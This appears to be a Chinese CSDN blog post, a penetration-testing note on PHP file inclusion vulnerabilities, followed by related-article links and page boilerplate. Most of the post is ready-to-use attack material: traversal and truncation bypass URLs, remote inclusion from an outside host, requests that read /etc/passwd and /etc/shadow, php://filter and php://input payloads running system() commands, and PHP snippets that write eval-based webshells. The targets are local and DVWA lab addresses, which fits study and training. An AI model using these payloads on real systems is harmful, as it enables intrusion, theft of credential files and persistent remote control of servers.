web文件包含漏洞

最新推荐文章于 2023-05-31 20:40:35 发布
最新推荐文章于 2023-05-31 20:40:35 发布
阅读量1k 收藏
点赞数
文章标签: php 安全 渗透 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46258964/article/details/121916464
版权

文件包含
开发人员会把重复使用的函数写到单个文件中,在使用函数某些特定的时候直接调用此文件称之为文件包含

文件包含漏洞的分类
本地文件包含(服务器上的本地文件)
远程文件包含(包含其他网站上的文件,比如一句话木马)

本地文件包含
无限制

http://127.0.0.0.1:8080/include.php?filename=1.txt
http://127.0.0.0.1:8080/include.php?filename=../../../shell.php

有限制

%00截断绕过,PHP版本<5.3.4
http://127.0.0.0.1:8080/include.php?filename=1.txt%00
长度截断绕过,Windows点号需要256,linux需要4096
http://127.0.0.0.1:8080/include.php?filename=1.txt/././././././././等

远程文件包含
无限制

http://127.0.0.0.1:8080/include.php?filename=http://www.xiaodi8.com/readme.txt

有限制?绕过,%23绕过

http://127.0.0.0.1:8080/include.php?filename=http://www.xiaodi8.com/readme.txt?
http://127.0.0.0.1:8080/include.php?filename=http://www.xiaodi8.com/readme.txt%23
http://127.0.0.0.1:8080/include.php?filename=http://www.xiaodi8.com/readme.txt%20

文件包含漏洞实现的功能
读取系统任意文件

http://127.0.0.0.1:8080/include.php?path=file:///etc/passswd

包含图片马直接获取webshell

http://127.0.0.0.1:8080/include.php?path=./webshell.png

包含图片写入shell

<?php fputs(fopen('shell.php','w'),"<?php @eval(\$_REQUEST['shell'])?>");?>
http://127.0.0.0.1:8080/include.php?path=./shell.png

包含文件写入webshell

写入一个1.txt文件
<?php
$myfile = fopen("1.php","w");
$txt = '<?php @eval($_REQUEST["cmd"]);?>';
fwrite($myfile,$txt);
fclose($myfile);
?>
然后包含文件
http://127.0.0.0.1:8080/include.php?path=1.php

PHP伪协议

file:// — 访问本地文件系统
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流(I/O streams)
zlib:// — 压缩流
data:// — 数据(RFC 2397)
glob:// — 查找匹配的文件路径模式
phar:// — PHP 归档
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — 音频流
expect:// — 处理交互式的流、

php://input

php://input可以访问请求的原始数据的只读流,
将post请求的数据当作php代码执行。当传入的参数作为文件名打开时,
可以将参数设为php://input,同时post想设置的文件内容,
php执行时会将post内容当作文件内容。

file://

访问本地系统文件
file://[文件的绝对路径和文件名]
http://127.0.0.1/include.php?file=file:///etc/passwd
[文件的相对路径和文件名]
http://127.0.0.1/include.php?file=./phpinfo.txt

http:// https://

URL 形式,允许通过 HTTP 1.0 的 GET方法,以只读访问文件或资源,通常用于远程包含。
[http://网络路径和文件名]
http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt

php://

php:// 用于访问各个输入/输出流(I/O streams),经常使用的是php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码

读取文件源码

php://filter/read=convert.base64-encode/resource=[文件名]
http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php

执行php代码用法

php://input + [POST DATA]
http://127.0.0.1/include.php?file=php://input
[POST DATA部分]
<?php phpinfo(); ?>
<?php system(ls);?>
<?php system('cat <flag.txt');?>

写入一句话木马

http://127.0.0.1/include.php?file=php://input
[POST DATA部分]
<?php fputs(fopen('shell.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>

常见读取配置文件
http://192.168.106.134/dvwa/vulnerabilities/fi/?page=/etc/passwd
http://192.168.106.134/dvwa/vulnerabilities/fi/?page=/etc/shadow
http://192.168.106.134/dvwa/vulnerabilities/fi/?page=/etc/php5/apache2/php.ini http://192.168.106.134/dvwa/vulnerabilities/fi/?page=/etc/mysql/my.cnf
http://192.168.106.134/dvwa/vulnerabilities/fi/?page=/etc/apache2/apache2.conf

西湖第一剑
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Web应用安全文件包含漏洞简介.pptx
06-18
大多数Web语言都支持文件包含操作,其中PHP语言所提供的文件包含功能太强大、太灵活,也就导致文件包含漏洞经常出现在PHP语言中。这里就以PHP语言为例。 PHP中提供了四个文件包含的函数: include( ) 当使用该函数...
php 文件操作实例
超级帅的一个小伙子的博客
04-25 853
概述: 主要用到 fopen fwrite fclose 三个函数。 ①. fopen()函数的用法为 fopen( “文件名”,”模式名”); 具体模式:如下图 ②.fwrite()函数用法为fwrite(“文件名”, 字符串),即将 $字符串 写入 指定文件。代码实例:①. 整体文件操作框架:<?php $myfile = fopen("ne
PHP文件包含漏洞利用phpinfo写入webshell
ADummy的博客
02-26 3865
带有PHPINFO的PHP本地文件包含RCE by ADummy 0x00利用路线 ​ 执行exp—>getshell ​ 适用于有本地文件包含漏洞,有phpinfo,怎么写入webshell的情况 0x01漏洞介绍 ​ 在PHP文件包含漏洞中,当我们找不到要触发RCE的有效文件时,如果有PHPINFO可以告诉我们随机生成的临时文件名及其位置,则可能可以包含一个临时文件来利用它来利用它。 启动环境后,可访问http://your-ip:8080/phpinfo.php以获取PHPINFO页
Web安全文件包含漏洞
Python_0011的博客
03-20 826
程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这种文件调用的过程一般被称为文件包含。程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入。动态包含。
Web的基本漏洞--文件包含漏洞
尽欢的博客
05-31 1303
文件包含漏洞介绍
Web安全——文件包含漏洞
qq_44915227的博客
04-22 949
文件包含漏洞是“代码注入”的一种。其原理就是注入一段用户能控制的脚本或代码,并让服务端执行。“代码注入”的典型代表就是文件包含文件包含漏洞可能出现在JSP、PHP、ASP等语言中,原理都是一样的。在PHP中,有四个用于包含文件的函数,当使用这些函数包含文件时,文件中包含的PHP代码会被执行。本地文件包含LFI(Local File Inclusion)当被包含的文件在服务器本地时,就形成本地文件包含
web网站文件包含漏洞和攻击-运维安全详细笔记总结
最新发布
06-30
web网站文件包含漏洞和攻击-运维安全详细笔记总结
web-渗透-文件上传漏洞专题靶场.rar
03-14
本靶场为二十一个关于文件上传漏洞的环境,从前端绕过、服务器绕过、木马图上传绕过、截断绕过、竞争条件等等几乎包含目前所有的文件上传漏洞类型,刷完即掌握文件上传漏洞的所有要点。 文件中打包了所需的所有环境...
第七式 七伤拳 web安全文件包含漏洞专题.pdf
06-22
tsrc线上培训资料 第七式 七伤拳 web安全文件包含漏洞专题
webshell基础方法总结
热门推荐
D1stiny的博客
04-20 3万+
文章目录管理权限拿webshell(进后台)一.正常上传拿webshell:二.数据库备份拿Webshell:三.突破本地验证拿webshell五.上传其他脚本类型拿webshell六.00截断拿webshell七.利用解析漏洞webshelliis5.x&6.0的漏洞Apache解析漏洞iis7.0/7.5/nginx<8.03畸形解析漏洞nginx<8.03空字节代码执行...
PHP文件包含漏洞攻防实战
weixin_30687811的博客
11-04 1574
摘要 PHP是一种非常流行的Web开发语言,互联网上的许多Web应用都是利用PHP开发的。而在利用PHP开发的Web应用中,PHP文件包含漏洞是一种常见的漏洞。利用PHP文件包含漏洞入侵网站也是主流的一种攻击手段。本文对PHP文件包含漏洞的形成、利用技巧及防范进行了详细的分析,并通过一个真实案例演示了如何利用PHP文件包含漏洞对目标网站进行渗透测试,最终成功获取到网站的WebShell。 1....
学习笔记二:webshell初探
mcc的博客
05-27 678
webshell初探 一.webshelll简介 webshell也就是网页muma,包括大马和小马,小马通过caidao等工具进行连接,大马自带管理界面。现在webshell支持包括php,asp,jsp,perl等语言。 二.webshell体验 1.小马总结 一句话 1.<?php @eval($_POST["pass"]); ?> 上面就是最简单的一句话,用于菜刀进...
Webshell实现与隐藏探究
weixin_30832405的博客
08-27 1236
一、什么是webshell webshell简介 webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据...
PHP webshell
yxwb1253587469的博客
07-21 1058
简单版 /*-------------------------------------------- Codz By pr0cess MSN:[email protected] Modified By Badboy Date:2009/23/06 ---------------------------------------------- */ header("Content-
Web漏洞文件包含漏洞
小赵同学的博客
06-29 962
为了使代码更加灵活,通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞
第31天:WEB漏洞-文件操作之文件包含漏洞全解
MCTSOG的博客
03-16 1733
文件包含漏洞 0x00 文件包含 程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这中文件调用的过程一般被称为文件包含。 0x01 文件包含漏洞的成因 程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用, 但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。 几乎所有脚本语言都会提供文件包含的功能。 在PHP中经常出现包含漏洞,但这并不意味这其他语言不存在。 0x02 文件包含漏洞的分类 本地文件包含.
web安全】——文件包含漏洞
Demo不是emo的博客
12-02 2万+
文件包含漏洞详解,持续更新中
Web安全 文件包含漏洞 (直接拿到 服务器 的最高权限)
网络安全领域___专研者.
02-12 4593
文件包含漏洞的概括:文件包含漏洞是 程序员在开发网站的时候,为了方便自己开发构架,使用了一些包含的函数(比如:php开发语言,include() , include_once() , require_once() ... ),而且包含函数中的变量,没有做一些过滤或者限制,使得用户可以 控制传到服务器中的数据,导致文件包含漏洞文件包含漏洞的执行规则:文件包含漏洞可以怎么理解,就是一个 A 文件包含着另一个 B 文件,将包含着 B 文件里面的内容,以这个网站的脚本代码 去
Web安全漏洞包括文件包含漏洞吗?
05-13
是的,文件包含漏洞Web安全漏洞的一种类型。文件包含漏洞通常发生在Web应用程序中,当应用程序使用用户提供的数据(如文件名或路径)来加载或执行文件时,攻击者可以通过构造恶意输入来实现远程代码执行或敏感信息...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值